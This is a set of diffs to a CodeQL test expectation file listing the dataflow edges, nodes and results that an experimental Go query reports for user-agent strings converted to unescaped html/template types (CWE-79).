+| HTMLTemplateEscapingPassthrough.go:58:38:58:38 | b | semmle.label | b |
+| HTMLTemplateEscapingPassthrough.go:58:38:58:38 | b | semmle.label | b |
+| HTMLTemplateEscapingPassthrough.go:58:38:58:38 | b | semmle.label | b |
+| HTMLTemplateEscapingPassthrough.go:58:38:58:38 | b | semmle.label | b |
 | HTMLTemplateEscapingPassthrough.go:61:11:61:42 | type conversion | semmle.label | type conversion |
+| HTMLTemplateEscapingPassthrough.go:61:11:61:42 | type conversion : Srcset | semmle.label | type conversion : Srcset |
+| HTMLTemplateEscapingPassthrough.go:61:11:61:42 | type conversion : Srcset | semmle.label | type conversion : Srcset |
+| HTMLTemplateEscapingPassthrough.go:61:11:61:42 | type conversion : Srcset | semmle.label | type conversion : Srcset |
+| HTMLTemplateEscapingPassthrough.go:61:11:61:42 | type conversion : Srcset | semmle.label | type conversion : Srcset |
+| HTMLTemplateEscapingPassthrough.go:61:11:61:42 | type conversion : Srcset | semmle.label | type conversion : Srcset |
+| HTMLTemplateEscapingPassthrough.go:61:11:61:42 | type conversion : Srcset | semmle.label | type conversion : Srcset |
+| HTMLTemplateEscapingPassthrough.go:61:11:61:42 | type conversion : Srcset | semmle.label | type conversion : Srcset |
 | HTMLTemplateEscapingPassthrough.go:61:11:61:42 | type conversion : string | semmle.label | type conversion : string |
 | HTMLTemplateEscapingPassthrough.go:61:27:61:41 | call to UserAgent : string | semmle.label | call to UserAgent : string |
 | HTMLTemplateEscapingPassthrough.go:61:27:61:41 | call to UserAgent : string | semmle.label | call to UserAgent : string |
 | HTMLTemplateEscapingPassthrough.go:62:44:62:44 | f | semmle.label | f |
+| HTMLTemplateEscapingPassthrough.go:62:44:62:44 | f | semmle.label | f |
+| HTMLTemplateEscapingPassthrough.go:62:44:62:44 | f | semmle.label | f |
+| HTMLTemplateEscapingPassthrough.go:62:44:62:44 | f | semmle.label | f |
+| HTMLTemplateEscapingPassthrough.go:62:44:62:44 | f | semmle.label | f |
+| HTMLTemplateEscapingPassthrough.go:62:44:62:44 | f | semmle.label | f |
+| HTMLTemplateEscapingPassthrough.go:62:44:62:44 | f | semmle.label | f |
+| HTMLTemplateEscapingPassthrough.go:62:44:62:44 | f | semmle.label | f |
 | HTMLTemplateEscapingPassthrough.go:65:11:65:39 | type conversion | semmle.label | type conversion |
+| HTMLTemplateEscapingPassthrough.go:65:11:65:39 | type conversion : URL | semmle.label | type conversion : URL |
+| HTMLTemplateEscapingPassthrough.go:65:11:65:39 | type conversion : URL | semmle.label | type conversion : URL |
+| HTMLTemplateEscapingPassthrough.go:65:11:65:39 | type conversion : URL | semmle.label | type conversion : URL |
+| HTMLTemplateEscapingPassthrough.go:65:11:65:39 | type conversion : URL | semmle.label | type conversion : URL |
+| HTMLTemplateEscapingPassthrough.go:65:11:65:39 | type conversion : URL | semmle.label | type conversion : URL |
+| HTMLTemplateEscapingPassthrough.go:65:11:65:39 | type conversion : URL | semmle.label | type conversion : URL |
+| HTMLTemplateEscapingPassthrough.go:65:11:65:39 | type conversion : URL | semmle.label | type conversion : URL |
 | HTMLTemplateEscapingPassthrough.go:65:11:65:39 | type conversion : string | semmle.label | type conversion : string |
 | HTMLTemplateEscapingPassthrough.go:65:24:65:38 | call to UserAgent : string | semmle.label | call to UserAgent : string |
 | HTMLTemplateEscapingPassthrough.go:65:24:65:38 | call to UserAgent : string | semmle.label | call to UserAgent : string |
 | HTMLTemplateEscapingPassthrough.go:66:38:66:38 | g | semmle.label | g |
-| HTMLTemplateEscapingPassthrough.go:74:16:74:30 | call to UserAgent : string | semmle.label | call to UserAgent : string |
-| HTMLTemplateEscapingPassthrough.go:75:38:75:43 | caught | semmle.label | caught |
+| HTMLTemplateEscapingPassthrough.go:66:38:66:38 | g | semmle.label | g |
+| HTMLTemplateEscapingPassthrough.go:66:38:66:38 | g | semmle.label | g |
+| HTMLTemplateEscapingPassthrough.go:66:38:66:38 | g | semmle.label | g |
+| HTMLTemplateEscapingPassthrough.go:66:38:66:38 | g | semmle.label | g |
+| HTMLTemplateEscapingPassthrough.go:66:38:66:38 | g | semmle.label | g |
+| HTMLTemplateEscapingPassthrough.go:66:38:66:38 | g | semmle.label | g |
+| HTMLTemplateEscapingPassthrough.go:66:38:66:38 | g | semmle.label | g |
 #select
 | HTMLTemplateEscapingPassthrough.go:29:39:29:39 | a | HTMLTemplateEscapingPassthrough.go:28:26:28:40 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:29:39:29:39 | a | Data from an $@ will not be auto-escaped because it was $@ to template.HTML | HTMLTemplateEscapingPassthrough.go:28:26:28:40 | call to UserAgent | untrusted source | HTMLTemplateEscapingPassthrough.go:28:12:28:41 | type conversion | converted |
 | HTMLTemplateEscapingPassthrough.go:35:40:35:40 | a | HTMLTemplateEscapingPassthrough.go:34:23:34:37 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:35:40:35:40 | a | Data from an $@ will not be auto-escaped because it was $@ to template.HTML | HTMLTemplateEscapingPassthrough.go:34:23:34:37 | call to UserAgent | untrusted source | HTMLTemplateEscapingPassthrough.go:34:9:34:38 | type conversion | converted |

--- a/ql/test/experimental/CWE-79/HTMLTemplateEscapingPassthrough.expected
+++ b/ql/test/experimental/CWE-79/HTMLTemplateEscapingPassthrough.expected
@@ -89,6 +89,9 @@ edges
 | HTMLTemplateEscapingPassthrough.go:65:11:65:39 | type conversion : string | HTMLTemplateEscapingPassthrough.go:66:38:66:38 | g |
 | HTMLTemplateEscapingPassthrough.go:65:24:65:38 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:65:11:65:39 | type conversion |
 | HTMLTemplateEscapingPassthrough.go:65:24:65:38 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:65:11:65:39 | type conversion : string |
+| HTMLTemplateEscapingPassthrough.go:74:17:74:31 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:75:38:75:44 | escaped |
+| HTMLTemplateEscapingPassthrough.go:80:10:80:24 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:81:16:81:33 | type conversion |
+| HTMLTemplateEscapingPassthrough.go:80:10:80:24 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:83:38:83:40 | src |
 nodes
 | HTMLTemplateEscapingPassthrough.go:28:12:28:41 | type conversion | semmle.label | type conversion |
 | HTMLTemplateEscapingPassthrough.go:28:12:28:41 | type conversion : HTML | semmle.label | type conversion : HTML |
@@ -261,6 +264,12 @@ nodes
 | HTMLTemplateEscapingPassthrough.go:66:38:66:38 | g | semmle.label | g |
 | HTMLTemplateEscapingPassthrough.go:66:38:66:38 | g | semmle.label | g |
 | HTMLTemplateEscapingPassthrough.go:66:38:66:38 | g | semmle.label | g |
+| HTMLTemplateEscapingPassthrough.go:74:17:74:31 | call to UserAgent : string | semmle.label | call to UserAgent : string |
+| HTMLTemplateEscapingPassthrough.go:75:38:75:44 | escaped | semmle.label | escaped |
+| HTMLTemplateEscapingPassthrough.go:80:10:80:24 | call to UserAgent : string | semmle.label | call to UserAgent : string |
+| HTMLTemplateEscapingPassthrough.go:80:10:80:24 | call to UserAgent : string | semmle.label | call to UserAgent : string |
+| HTMLTemplateEscapingPassthrough.go:81:16:81:33 | type conversion | semmle.label | type conversion |
+| HTMLTemplateEscapingPassthrough.go:83:38:83:40 | src | semmle.label | src |
 #select
 | HTMLTemplateEscapingPassthrough.go:29:39:29:39 | a | HTMLTemplateEscapingPassthrough.go:28:26:28:40 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:29:39:29:39 | a | Data from an $@ will not be auto-escaped because it was $@ to template.HTML | HTMLTemplateEscapingPassthrough.go:28:26:28:40 | call to UserAgent | untrusted source | HTMLTemplateEscapingPassthrough.go:28:12:28:41 | type conversion | converted |
 | HTMLTemplateEscapingPassthrough.go:35:40:35:40 | a | HTMLTemplateEscapingPassthrough.go:34:23:34:37 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:35:40:35:40 | a | Data from an $@ will not be auto-escaped because it was $@ to template.HTML | HTMLTemplateEscapingPassthrough.go:34:23:34:37 | call to UserAgent | untrusted source | HTMLTemplateEscapingPassthrough.go:34:9:34:38 | type conversion | converted |

--- a/ql/test/experimental/CWE-79/HTMLTemplateEscapingPassthrough.expected
+++ b/ql/test/experimental/CWE-79/HTMLTemplateEscapingPassthrough.expected
@@ -1,55 +1,274 @@
 edges
+| HTMLTemplateEscapingPassthrough.go:28:12:28:41 | type conversion : HTML | HTMLTemplateEscapingPassthrough.go:29:39:29:39 | a |
+| HTMLTemplateEscapingPassthrough.go:28:12:28:41 | type conversion : HTML | HTMLTemplateEscapingPassthrough.go:29:39:29:39 | a |
+| HTMLTemplateEscapingPassthrough.go:28:12:28:41 | type conversion : HTML | HTMLTemplateEscapingPassthrough.go:29:39:29:39 | a |
+| HTMLTemplateEscapingPassthrough.go:28:12:28:41 | type conversion : HTML | HTMLTemplateEscapingPassthrough.go:29:39:29:39 | a |
+| HTMLTemplateEscapingPassthrough.go:28:12:28:41 | type conversion : HTML | HTMLTemplateEscapingPassthrough.go:29:39:29:39 | a |
+| HTMLTemplateEscapingPassthrough.go:28:12:28:41 | type conversion : HTML | HTMLTemplateEscapingPassthrough.go:29:39:29:39 | a |
+| HTMLTemplateEscapingPassthrough.go:28:12:28:41 | type conversion : HTML | HTMLTemplateEscapingPassthrough.go:29:39:29:39 | a |
 | HTMLTemplateEscapingPassthrough.go:28:12:28:41 | type conversion : string | HTMLTemplateEscapingPassthrough.go:29:39:29:39 | a |
+| HTMLTemplateEscapingPassthrough.go:28:26:28:40 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:28:12:28:41 | type conversion |
 | HTMLTemplateEscapingPassthrough.go:28:26:28:40 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:28:12:28:41 | type conversion : string |
+| HTMLTemplateEscapingPassthrough.go:34:9:34:38 | type conversion : HTML | HTMLTemplateEscapingPassthrough.go:35:40:35:40 | a |
+| HTMLTemplateEscapingPassthrough.go:34:9:34:38 | type conversion : HTML | HTMLTemplateEscapingPassthrough.go:35:40:35:40 | a |
+| HTMLTemplateEscapingPassthrough.go:34:9:34:38 | type conversion : HTML | HTMLTemplateEscapingPassthrough.go:35:40:35:40 | a |
+| HTMLTemplateEscapingPassthrough.go:34:9:34:38 | type conversion : HTML | HTMLTemplateEscapingPassthrough.go:35:40:35:40 | a |
+| HTMLTemplateEscapingPassthrough.go:34:9:34:38 | type conversion : HTML | HTMLTemplateEscapingPassthrough.go:35:40:35:40 | a |
+| HTMLTemplateEscapingPassthrough.go:34:9:34:38 | type conversion : HTML | HTMLTemplateEscapingPassthrough.go:35:40:35:40 | a |
+| HTMLTemplateEscapingPassthrough.go:34:9:34:38 | type conversion : HTML | HTMLTemplateEscapingPassthrough.go:35:40:35:40 | a |
 | HTMLTemplateEscapingPassthrough.go:34:9:34:38 | type conversion : string | HTMLTemplateEscapingPassthrough.go:35:40:35:40 | a |
+| HTMLTemplateEscapingPassthrough.go:34:23:34:37 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:34:9:34:38 | type conversion |
 | HTMLTemplateEscapingPassthrough.go:34:23:34:37 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:34:9:34:38 | type conversion : string |
+| HTMLTemplateEscapingPassthrough.go:39:9:39:34 | type conversion : HTML | HTMLTemplateEscapingPassthrough.go:40:40:40:40 | a |
+| HTMLTemplateEscapingPassthrough.go:39:9:39:34 | type conversion : HTML | HTMLTemplateEscapingPassthrough.go:40:40:40:40 | a |
+| HTMLTemplateEscapingPassthrough.go:39:9:39:34 | type conversion : HTML | HTMLTemplateEscapingPassthrough.go:40:40:40:40 | a |
+| HTMLTemplateEscapingPassthrough.go:39:9:39:34 | type conversion : HTML | HTMLTemplateEscapingPassthrough.go:40:40:40:40 | a |
+| HTMLTemplateEscapingPassthrough.go:39:9:39:34 | type conversion : HTML | HTMLTemplateEscapingPassthrough.go:40:40:40:40 | a |
+| HTMLTemplateEscapingPassthrough.go:39:9:39:34 | type conversion : HTML | HTMLTemplateEscapingPassthrough.go:40:40:40:40 | a |
+| HTMLTemplateEscapingPassthrough.go:39:9:39:34 | type conversion : HTML | HTMLTemplateEscapingPassthrough.go:40:40:40:40 | a |
 | HTMLTemplateEscapingPassthrough.go:39:9:39:34 | type conversion : string | HTMLTemplateEscapingPassthrough.go:40:40:40:40 | a |
+| HTMLTemplateEscapingPassthrough.go:39:19:39:33 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:39:9:39:34 | type conversion |
 | HTMLTemplateEscapingPassthrough.go:39:19:39:33 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:39:9:39:34 | type conversion : string |
+| HTMLTemplateEscapingPassthrough.go:45:11:45:44 | type conversion : HTMLAttr | HTMLTemplateEscapingPassthrough.go:46:41:46:41 | c |
+| HTMLTemplateEscapingPassthrough.go:45:11:45:44 | type conversion : HTMLAttr | HTMLTemplateEscapingPassthrough.go:46:41:46:41 | c |
+| HTMLTemplateEscapingPassthrough.go:45:11:45:44 | type conversion : HTMLAttr | HTMLTemplateEscapingPassthrough.go:46:41:46:41 | c |
+| HTMLTemplateEscapingPassthrough.go:45:11:45:44 | type conversion : HTMLAttr | HTMLTemplateEscapingPassthrough.go:46:41:46:41 | c |
+| HTMLTemplateEscapingPassthrough.go:45:11:45:44 | type conversion : HTMLAttr | HTMLTemplateEscapingPassthrough.go:46:41:46:41 | c |
+| HTMLTemplateEscapingPassthrough.go:45:11:45:44 | type conversion : HTMLAttr | HTMLTemplateEscapingPassthrough.go:46:41:46:41 | c |
+| HTMLTemplateEscapingPassthrough.go:45:11:45:44 | type conversion : HTMLAttr | HTMLTemplateEscapingPassthrough.go:46:41:46:41 | c |
 | HTMLTemplateEscapingPassthrough.go:45:11:45:44 | type conversion : string | HTMLTemplateEscapingPassthrough.go:46:41:46:41 | c |
+| HTMLTemplateEscapingPassthrough.go:45:29:45:43 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:45:11:45:44 | type conversion |
 | HTMLTemplateEscapingPassthrough.go:45:29:45:43 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:45:11:45:44 | type conversion : string |
+| HTMLTemplateEscapingPassthrough.go:49:11:49:38 | type conversion : JS | HTMLTemplateEscapingPassthrough.go:50:44:50:44 | d |
+| HTMLTemplateEscapingPassthrough.go:49:11:49:38 | type conversion : JS | HTMLTemplateEscapingPassthrough.go:50:44:50:44 | d |
+| HTMLTemplateEscapingPassthrough.go:49:11:49:38 | type conversion : JS | HTMLTemplateEscapingPassthrough.go:50:44:50:44 | d |
+| HTMLTemplateEscapingPassthrough.go:49:11:49:38 | type conversion : JS | HTMLTemplateEscapingPassthrough.go:50:44:50:44 | d |
+| HTMLTemplateEscapingPassthrough.go:49:11:49:38 | type conversion : JS | HTMLTemplateEscapingPassthrough.go:50:44:50:44 | d |
+| HTMLTemplateEscapingPassthrough.go:49:11:49:38 | type conversion : JS | HTMLTemplateEscapingPassthrough.go:50:44:50:44 | d |
+| HTMLTemplateEscapingPassthrough.go:49:11:49:38 | type conversion : JS | HTMLTemplateEscapingPassthrough.go:50:44:50:44 | d |
 | HTMLTemplateEscapingPassthrough.go:49:11:49:38 | type conversion : string | HTMLTemplateEscapingPassthrough.go:50:44:50:44 | d |
+| HTMLTemplateEscapingPassthrough.go:49:23:49:37 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:49:11:49:38 | type conversion |
 | HTMLTemplateEscapingPassthrough.go:49:23:49:37 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:49:11:49:38 | type conversion : string |
+| HTMLTemplateEscapingPassthrough.go:53:11:53:41 | type conversion : JSStr | HTMLTemplateEscapingPassthrough.go:54:44:54:44 | e |
+| HTMLTemplateEscapingPassthrough.go:53:11:53:41 | type conversion : JSStr | HTMLTemplateEscapingPassthrough.go:54:44:54:44 | e |
+| HTMLTemplateEscapingPassthrough.go:53:11:53:41 | type conversion : JSStr | HTMLTemplateEscapingPassthrough.go:54:44:54:44 | e |
+| HTMLTemplateEscapingPassthrough.go:53:11:53:41 | type conversion : JSStr | HTMLTemplateEscapingPassthrough.go:54:44:54:44 | e |
+| HTMLTemplateEscapingPassthrough.go:53:11:53:41 | type conversion : JSStr | HTMLTemplateEscapingPassthrough.go:54:44:54:44 | e |
+| HTMLTemplateEscapingPassthrough.go:53:11:53:41 | type conversion : JSStr | HTMLTemplateEscapingPassthrough.go:54:44:54:44 | e |
+| HTMLTemplateEscapingPassthrough.go:53:11:53:41 | type conversion : JSStr | HTMLTemplateEscapingPassthrough.go:54:44:54:44 | e |
 | HTMLTemplateEscapingPassthrough.go:53:11:53:41 | type conversion : string | HTMLTemplateEscapingPassthrough.go:54:44:54:44 | e |
+| HTMLTemplateEscapingPassthrough.go:53:26:53:40 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:53:11:53:41 | type conversion |
 | HTMLTemplateEscapingPassthrough.go:53:26:53:40 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:53:11:53:41 | type conversion : string |
+| HTMLTemplateEscapingPassthrough.go:57:11:57:39 | type conversion : CSS | HTMLTemplateEscapingPassthrough.go:58:38:58:38 | b |
+| HTMLTemplateEscapingPassthrough.go:57:11:57:39 | type conversion : CSS | HTMLTemplateEscapingPassthrough.go:58:38:58:38 | b |
+| HTMLTemplateEscapingPassthrough.go:57:11:57:39 | type conversion : CSS | HTMLTemplateEscapingPassthrough.go:58:38:58:38 | b |
+| HTMLTemplateEscapingPassthrough.go:57:11:57:39 | type conversion : CSS | HTMLTemplateEscapingPassthrough.go:58:38:58:38 | b |
+| HTMLTemplateEscapingPassthrough.go:57:11:57:39 | type conversion : CSS | HTMLTemplateEscapingPassthrough.go:58:38:58:38 | b |
+| HTMLTemplateEscapingPassthrough.go:57:11:57:39 | type conversion : CSS | HTMLTemplateEscapingPassthrough.go:58:38:58:38 | b |
+| HTMLTemplateEscapingPassthrough.go:57:11:57:39 | type conversion : CSS | HTMLTemplateEscapingPassthrough.go:58:38:58:38 | b |
 | HTMLTemplateEscapingPassthrough.go:57:11:57:39 | type conversion : string | HTMLTemplateEscapingPassthrough.go:58:38:58:38 | b |
+| HTMLTemplateEscapingPassthrough.go:57:24:57:38 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:57:11:57:39 | type conversion |
 | HTMLTemplateEscapingPassthrough.go:57:24:57:38 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:57:11:57:39 | type conversion : string |
+| HTMLTemplateEscapingPassthrough.go:61:11:61:42 | type conversion : Srcset | HTMLTemplateEscapingPassthrough.go:62:44:62:44 | f |
+| HTMLTemplateEscapingPassthrough.go:61:11:61:42 | type conversion : Srcset | HTMLTemplateEscapingPassthrough.go:62:44:62:44 | f |
+| HTMLTemplateEscapingPassthrough.go:61:11:61:42 | type conversion : Srcset | HTMLTemplateEscapingPassthrough.go:62:44:62:44 | f |
+| HTMLTemplateEscapingPassthrough.go:61:11:61:42 | type conversion : Srcset | HTMLTemplateEscapingPassthrough.go:62:44:62:44 | f |
+| HTMLTemplateEscapingPassthrough.go:61:11:61:42 | type conversion : Srcset | HTMLTemplateEscapingPassthrough.go:62:44:62:44 | f |
+| HTMLTemplateEscapingPassthrough.go:61:11:61:42 | type conversion : Srcset | HTMLTemplateEscapingPassthrough.go:62:44:62:44 | f |
+| HTMLTemplateEscapingPassthrough.go:61:11:61:42 | type conversion : Srcset | HTMLTemplateEscapingPassthrough.go:62:44:62:44 | f |
 | HTMLTemplateEscapingPassthrough.go:61:11:61:42 | type conversion : string | HTMLTemplateEscapingPassthrough.go:62:44:62:44 | f |
+| HTMLTemplateEscapingPassthrough.go:61:27:61:41 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:61:11:61:42 | type conversion |
 | HTMLTemplateEscapingPassthrough.go:61:27:61:41 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:61:11:61:42 | type conversion : string |
+| HTMLTemplateEscapingPassthrough.go:65:11:65:39 | type conversion : URL | HTMLTemplateEscapingPassthrough.go:66:38:66:38 | g |
+| HTMLTemplateEscapingPassthrough.go:65:11:65:39 | type conversion : URL | HTMLTemplateEscapingPassthrough.go:66:38:66:38 | g |
+| HTMLTemplateEscapingPassthrough.go:65:11:65:39 | type conversion : URL | HTMLTemplateEscapingPassthrough.go:66:38:66:38 | g |
+| HTMLTemplateEscapingPassthrough.go:65:11:65:39 | type conversion : URL | HTMLTemplateEscapingPassthrough.go:66:38:66:38 | g |
+| HTMLTemplateEscapingPassthrough.go:65:11:65:39 | type conversion : URL | HTMLTemplateEscapingPassthrough.go:66:38:66:38 | g |
+| HTMLTemplateEscapingPassthrough.go:65:11:65:39 | type conversion : URL | HTMLTemplateEscapingPassthrough.go:66:38:66:38 | g |
+| HTMLTemplateEscapingPassthrough.go:65:11:65:39 | type conversion : URL | HTMLTemplateEscapingPassthrough.go:66:38:66:38 | g |
 | HTMLTemplateEscapingPassthrough.go:65:11:65:39 | type conversion : string | HTMLTemplateEscapingPassthrough.go:66:38:66:38 | g |
+| HTMLTemplateEscapingPassthrough.go:65:24:65:38 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:65:11:65:39 | type conversion |
 | HTMLTemplateEscapingPassthrough.go:65:24:65:38 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:65:11:65:39 | type conversion : string |
 | HTMLTemplateEscapingPassthrough.go:74:17:74:31 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:75:38:75:44 | escaped |
+| HTMLTemplateEscapingPassthrough.go:80:10:80:24 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:81:16:81:33 | type conversion |
 | HTMLTemplateEscapingPassthrough.go:80:10:80:24 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:83:38:83:40 | src |
 nodes
+| HTMLTemplateEscapingPassthrough.go:28:12:28:41 | type conversion | semmle.label | type conversion |
+| HTMLTemplateEscapingPassthrough.go:28:12:28:41 | type conversion : HTML | semmle.label | type conversion : HTML |
+| HTMLTemplateEscapingPassthrough.go:28:12:28:41 | type conversion : HTML | semmle.label | type conversion : HTML |
+| HTMLTemplateEscapingPassthrough.go:28:12:28:41 | type conversion : HTML | semmle.label | type conversion : HTML |
+| HTMLTemplateEscapingPassthrough.go:28:12:28:41 | type conversion : HTML | semmle.label | type conversion : HTML |
+| HTMLTemplateEscapingPassthrough.go:28:12:28:41 | type conversion : HTML | semmle.label | type conversion : HTML |
+| HTMLTemplateEscapingPassthrough.go:28:12:28:41 | type conversion : HTML | semmle.label | type conversion : HTML |
+| HTMLTemplateEscapingPassthrough.go:28:12:28:41 | type conversion : HTML | semmle.label | type conversion : HTML |
 | HTMLTemplateEscapingPassthrough.go:28:12:28:41 | type conversion : string | semmle.label | type conversion : string |
 | HTMLTemplateEscapingPassthrough.go:28:26:28:40 | call to UserAgent : string | semmle.label | call to UserAgent : string |
+| HTMLTemplateEscapingPassthrough.go:28:26:28:40 | call to UserAgent : string | semmle.label | call to UserAgent : string |
 | HTMLTemplateEscapingPassthrough.go:29:39:29:39 | a | semmle.label | a |
+| HTMLTemplateEscapingPassthrough.go:29:39:29:39 | a | semmle.label | a |
+| HTMLTemplateEscapingPassthrough.go:29:39:29:39 | a | semmle.label | a |
+| HTMLTemplateEscapingPassthrough.go:29:39:29:39 | a | semmle.label | a |
+| HTMLTemplateEscapingPassthrough.go:29:39:29:39 | a | semmle.label | a |
+| HTMLTemplateEscapingPassthrough.go:29:39:29:39 | a | semmle.label | a |
+| HTMLTemplateEscapingPassthrough.go:29:39:29:39 | a | semmle.label | a |
+| HTMLTemplateEscapingPassthrough.go:29:39:29:39 | a | semmle.label | a |
+| HTMLTemplateEscapingPassthrough.go:34:9:34:38 | type conversion | semmle.label | type conversion |
+| HTMLTemplateEscapingPassthrough.go:34:9:34:38 | type conversion : HTML | semmle.label | type conversion : HTML |
+| HTMLTemplateEscapingPassthrough.go:34:9:34:38 | type conversion : HTML | semmle.label | type conversion : HTML |
+| HTMLTemplateEscapingPassthrough.go:34:9:34:38 | type conversion : HTML | semmle.label | type conversion : HTML |
+| HTMLTemplateEscapingPassthrough.go:34:9:34:38 | type conversion : HTML | semmle.label | type conversion : HTML |
+| HTMLTemplateEscapingPassthrough.go:34:9:34:38 | type conversion : HTML | semmle.label | type conversion : HTML |
+| HTMLTemplateEscapingPassthrough.go:34:9:34:38 | type conversion : HTML | semmle.label | type conversion : HTML |
+| HTMLTemplateEscapingPassthrough.go:34:9:34:38 | type conversion : HTML | semmle.label | type conversion : HTML |
 | HTMLTemplateEscapingPassthrough.go:34:9:34:38 | type conversion : string | semmle.label | type conversion : string |
 | HTMLTemplateEscapingPassthrough.go:34:23:34:37 | call to UserAgent : string | semmle.label | call to UserAgent : string |
+| HTMLTemplateEscapingPassthrough.go:34:23:34:37 | call to UserAgent : string | semmle.label | call to UserAgent : string |
 | HTMLTemplateEscapingPassthrough.go:35:40:35:40 | a | semmle.label | a |
+| HTMLTemplateEscapingPassthrough.go:35:40:35:40 | a | semmle.label | a |
+| HTMLTemplateEscapingPassthrough.go:35:40:35:40 | a | semmle.label | a |
+| HTMLTemplateEscapingPassthrough.go:35:40:35:40 | a | semmle.label | a |
+| HTMLTemplateEscapingPassthrough.go:35:40:35:40 | a | semmle.label | a |
+| HTMLTemplateEscapingPassthrough.go:35:40:35:40 | a | semmle.label | a |
+| HTMLTemplateEscapingPassthrough.go:35:40:35:40 | a | semmle.label | a |
+| HTMLTemplateEscapingPassthrough.go:35:40:35:40 | a | semmle.label | a |
+| HTMLTemplateEscapingPassthrough.go:39:9:39:34 | type conversion | semmle.label | type conversion |
+| HTMLTemplateEscapingPassthrough.go:39:9:39:34 | type conversion : HTML | semmle.label | type conversion : HTML |
+| HTMLTemplateEscapingPassthrough.go:39:9:39:34 | type conversion : HTML | semmle.label | type conversion : HTML |
+| HTMLTemplateEscapingPassthrough.go:39:9:39:34 | type conversion : HTML | semmle.label | type conversion : HTML |
+| HTMLTemplateEscapingPassthrough.go:39:9:39:34 | type conversion : HTML | semmle.label | type conversion : HTML |
+| HTMLTemplateEscapingPassthrough.go:39:9:39:34 | type conversion : HTML | semmle.label | type conversion : HTML |
+| HTMLTemplateEscapingPassthrough.go:39:9:39:34 | type conversion : HTML | semmle.label | type conversion : HTML |
+| HTMLTemplateEscapingPassthrough.go:39:9:39:34 | type conversion : HTML | semmle.label | type conversion : HTML |
 | HTMLTemplateEscapingPassthrough.go:39:9:39:34 | type conversion : string | semmle.label | type conversion : string |
 | HTMLTemplateEscapingPassthrough.go:39:19:39:33 | call to UserAgent : string | semmle.label | call to UserAgent : string |
+| HTMLTemplateEscapingPassthrough.go:39:19:39:33 | call to UserAgent : string | semmle.label | call to UserAgent : string |
 | HTMLTemplateEscapingPassthrough.go:40:40:40:40 | a | semmle.label | a |
+| HTMLTemplateEscapingPassthrough.go:40:40:40:40 | a | semmle.label | a |
+| HTMLTemplateEscapingPassthrough.go:40:40:40:40 | a | semmle.label | a |
+| HTMLTemplateEscapingPassthrough.go:40:40:40:40 | a | semmle.label | a |
+| HTMLTemplateEscapingPassthrough.go:40:40:40:40 | a | semmle.label | a |
+| HTMLTemplateEscapingPassthrough.go:40:40:40:40 | a | semmle.label | a |
+| HTMLTemplateEscapingPassthrough.go:40:40:40:40 | a | semmle.label | a |
+| HTMLTemplateEscapingPassthrough.go:40:40:40:40 | a | semmle.label | a |
+| HTMLTemplateEscapingPassthrough.go:45:11:45:44 | type conversion | semmle.label | type conversion |
+| HTMLTemplateEscapingPassthrough.go:45:11:45:44 | type conversion : HTMLAttr | semmle.label | type conversion : HTMLAttr |
+| HTMLTemplateEscapingPassthrough.go:45:11:45:44 | type conversion : HTMLAttr | semmle.label | type conversion : HTMLAttr |
+| HTMLTemplateEscapingPassthrough.go:45:11:45:44 | type conversion : HTMLAttr | semmle.label | type conversion : HTMLAttr |
+| HTMLTemplateEscapingPassthrough.go:45:11:45:44 | type conversion : HTMLAttr | semmle.label | type conversion : HTMLAttr |
+| HTMLTemplateEscapingPassthrough.go:45:11:45:44 | type conversion : HTMLAttr | semmle.label | type conversion : HTMLAttr |
+| HTMLTemplateEscapingPassthrough.go:45:11:45:44 | type conversion : HTMLAttr | semmle.label | type conversion : HTMLAttr |
+| HTMLTemplateEscapingPassthrough.go:45:11:45:44 | type conversion : HTMLAttr | semmle.label | type conversion : HTMLAttr |
 | HTMLTemplateEscapingPassthrough.go:45:11:45:44 | type conversion : string | semmle.label | type conversion : string |
 | HTMLTemplateEscapingPassthrough.go:45:29:45:43 | call to UserAgent : string | semmle.label | call to UserAgent : string |
+| HTMLTemplateEscapingPassthrough.go:45:29:45:43 | call to UserAgent : string | semmle.label | call to UserAgent : string |
 | HTMLTemplateEscapingPassthrough.go:46:41:46:41 | c | semmle.label | c |
+| HTMLTemplateEscapingPassthrough.go:46:41:46:41 | c | semmle.label | c |
+| HTMLTemplateEscapingPassthrough.go:46:41:46:41 | c | semmle.label | c |
+| HTMLTemplateEscapingPassthrough.go:46:41:46:41 | c | semmle.label | c |
+| HTMLTemplateEscapingPassthrough.go:46:41:46:41 | c | semmle.label | c |
+| HTMLTemplateEscapingPassthrough.go:46:41:46:41 | c | semmle.label | c |
+| HTMLTemplateEscapingPassthrough.go:46:41:46:41 | c | semmle.label | c |
+| HTMLTemplateEscapingPassthrough.go:46:41:46:41 | c | semmle.label | c |
+| HTMLTemplateEscapingPassthrough.go:49:11:49:38 | type conversion | semmle.label | type conversion |
+| HTMLTemplateEscapingPassthrough.go:49:11:49:38 | type conversion : JS | semmle.label | type conversion : JS |
